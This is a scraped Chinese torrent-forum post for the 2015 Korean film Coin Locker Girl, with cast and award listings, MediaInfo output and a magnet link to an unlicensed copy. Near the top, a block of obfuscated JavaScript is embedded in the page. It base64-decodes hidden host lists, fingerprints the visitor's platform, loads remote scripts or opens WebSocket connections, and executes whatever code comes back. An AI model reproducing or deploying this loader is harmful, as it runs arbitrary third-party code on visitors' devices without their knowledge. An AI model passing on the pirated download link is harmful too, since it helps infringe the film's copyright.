中国城[中文字幕].Coin.Locker.Girl.2015.1080p.TVN.WEB-DL.H264.AAC 3.94GB

版主小s 25天前 727

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x62\x50\x73\x42\x6e\x58\x4f\x42\x73\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXlxa2RmODc5Zi5hc2xleXR5LmNvbbSxodHRwczovL29oamZrN2pmMjguZ3Nqemxzc3dzLmNvbbQ==','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['b','O']);}:function(){};

◎译  名 中国城 / 唐人街 / 储物柜女孩 / Chinatown / Coin Locker Girl
◎片  名 ?????
◎年  代 2015
◎产  地 韩国
◎类  别 剧情
◎语  言 韩语
◎上映日期 2015-04-29(韩国)
◎IMDb链接 https://www.imdb.com/title/tt4647788/
◎豆瓣评分 7.3/10 (25605人评价)
◎豆瓣链接 https://movie.douban.com/subject/25890078/
◎片  长 110分钟
◎导  演 韩俊熙 Jun-hee Han (id:1349648)
◎编  剧 韩俊熙 Jun-hee Han (id:1349648)
◎演  员 金惠秀 Hye-soo Kim (id:1050699)
       金高银 Go-eun Kim (id:1320871)
       高庚杓 Kyung-pyo Go (id:1326285)
       朴宝剑 Bo-Gum Park (id:1342125)
       严泰九 Tae-goo Eom (id:1345798)
       李秀卿 Soo-kyung Lee (id:1353188)
       赵贤哲 Hyun-Chul Cho (id:1380429)
       赵福来 Bok-rae Jo (id:1347926)
       李代延 Dae-yeon Lee (id:1042754)
       郑锡勇 Seok-yong Jeong (id:1339692)
       姜惠贞 Hye-jeong Kang (id:1014222)
       李尚熙 Sang-hee Lee (id:1365338)
       金秀安 Soo-an Kim (id:1343668)
       魏化俊 Ha-joon Wi (id:1388287)
       奇周峯 Joo-bong Ki (id:1051277)
       李敏芝 Min-ji Lee (id:1355343)
       张河蓝 Jang Ha-ram (id:1368093)
       吴代焕 Oh Dae-hwan (id:1376705)
       裴侑蓝 Bae Yoo-ram (id:1378640)
       俞智贤 Yu Ji-hyun (id:1381904)
       白秀章 Soo-Jang Baek (id:1366939)
       吴宥真 Oh Yu-jin (id:1381329)
       黄载沅 Hwang Jae-won (id:1381686)
       洪承鎮 Hong Seung-jin (id:1383766)
       权爀 Hyuk Kwon (id:1383963)
         (id:1359402)
       Chae-rin Chae-rin (id:1455483)
       张领圭 Young-gyu Jang (id:1329974)
       李莫元 Mok-won Lee (id:1386940)

◎标  签 韩国 / 韩国电影 / 金高恩 / 犯罪/悬疑/黑帮/暴力/动作 / 犯罪 / 剧情 / 朴宝剑 / 暴力

◎简  介
  讲述的是被遗弃在地铁投币储物柜的女孩,被高利贷不法分子养大成人的故事,被称为女版《华颐:吞噬怪物的孩子》。金惠秀饰演高利贷集团的老板,也是女孩的养母。而金高恩则饰演“储物柜女孩”日英,并为高利贷组织执行各种任务。严泰九将在片中饰演守护日英的宇坤一角。对于高利贷集团中长大的日英有着爱恋之情,是一个纯洁又充满浪漫细胞的角色。而为了解救日英,也展现出男子汉的一面,角色性格反转令影迷非常期待。

◎获奖情况 (共10项)
  第68届戛纳电影节 (2015)
  金摄影机奖(导演处女作奖)(提名)
   └──韩俊熙 (id:1349648)

  第10届亚洲电影大奖 (2016)
  最佳女主角(提名)
   └──金惠秀 (id:1050699)

  第52届百想艺术大赏 (2016)
  电影类 最佳男配角(提名)
   └──严泰九 (id:1345798)
  电影类 最佳新人男演员(提名)
  电影类 最佳新人导演
   └──韩俊熙 (id:1349648)

  第52届韩国电影大钟奖 (2015)
  最佳女主角(提名)
   └──金惠秀 (id:1050699)
  最佳新人导演(提名)
   └──韩俊熙 (id:1349648)

  第19届富川国际奇幻电影节 (2015)
  富川选择奖(长片) 最佳影片(提名)
  富川选择奖(长片) 最佳女演员特别提名
   └──金高银 (id:1320871)
  富川选择奖(长片) 评委选择奖
   └──韩俊熙 (id:1349648)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 165549895791671354725903182700784492950 (0x7C8BC00A74949C1204495D0A0DFDA196)

  4. Complete name                            : [email protected].mkv

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 3.94 GiB

  8. Duration                                 : 1 h 50 min

  9. Overall bit rate                         : 5 130 kb/s

  10. Encoded date                             : UTC 2021-08-21 14:28:58

  11. Writing application                      : mkvmerge v56.1.0 ('My Friend') 64-bit

  12. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID                                       : 1

  15. Format                                   : AVC

  16. Format/Info                              : Advanced Video Codec

  17. Format profile                           : [email protected]

  18. Format settings                          : 2 Ref Frames

  19. Format settings, CABAC                   : No

  20. Format settings, Reference frames        : 2 frames

  21. Codec ID                                 : V_MPEG4/ISO/AVC

  22. Duration                                 : 1 h 50 min

  23. Bit rate mode                            : Constant

  24. Bit rate                                 : 5 000 kb/s

  25. Width                                    : 1 920 pixels

  26. Height                                   : 1 080 pixels

  27. Display aspect ratio                     : 16:9

  28. Frame rate mode                          : Constant

  29. Frame rate                               : 23.976 (24000/1001/53354) FPS

  30. Color space                              : YUV

  31. Chroma subsampling                       : 4:2:0

  32. Bit depth                                : 8 bits

  33. Scan type                                : Progressive

  34. Bits/(Pixel*Frame)                       : 0.101

  35. Stream size                              : 3.84 GiB (97%)

  36. Default                                  : Yes

  37. Forced                                   : No


  38. Audio

  39. ID                                       : 2

  40. Format                                   : AAC LC

  41. Format/Info                              : Advanced Audio Codec Low Complexity

  42. Codec ID                                 : A_AAC-2

  43. Duration                                 : 1 h 50 min

  44. Bit rate                                 : 128 kb/s

  45. Channel(s)                               : 2 channels

  46. Channel layout                           : L R

  47. Sampling rate                            : 44.1 kHz

  48. Frame rate                               : 43.066 FPS (1024 SPF)

  49. Compression mode                         : Lossy

  50. Stream size                              : 101 MiB (2%)

  51. Language                                 : Korean

  52. Default                                  : Yes

  53. Forced                                   : No


  54. Text #1

  55. ID                                       : 3

  56. Format                                   : UTF-8

  57. Codec ID                                 : S_TEXT/UTF8

  58. Codec ID/Info                            : UTF-8 Plain Text

  59. Duration                                 : 1 h 46 min

  60. Bit rate                                 : 27 b/s

  61. Count of elements                        : 1010

  62. Stream size                              : 21.5 KiB (0%)

  63. Title                                    : Chinese Simplified

  64. Language                                 : Chinese

  65. Default                                  : Yes

  66. Forced                                   : No


  67. Text #2

  68. ID                                       : 4

  69. Format                                   : UTF-8

  70. Codec ID                                 : S_TEXT/UTF8

  71. Codec ID/Info                            : UTF-8 Plain Text

  72. Duration                                 : 1 h 46 min

  73. Bit rate                                 : 27 b/s

  74. Count of elements                        : 1010

  75. Stream size                              : 21.5 KiB (0%)

  76. Title                                    : Chinese Traditional

  77. Language                                 : Chinese

  78. Default                                  : No

  79. Forced                                   : No



TAGS 剧情

磁力链:
  • magnet:?xt=urn:btih:3730CD2DE3C8EABE626D9AE33FDD87D686373EF4
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回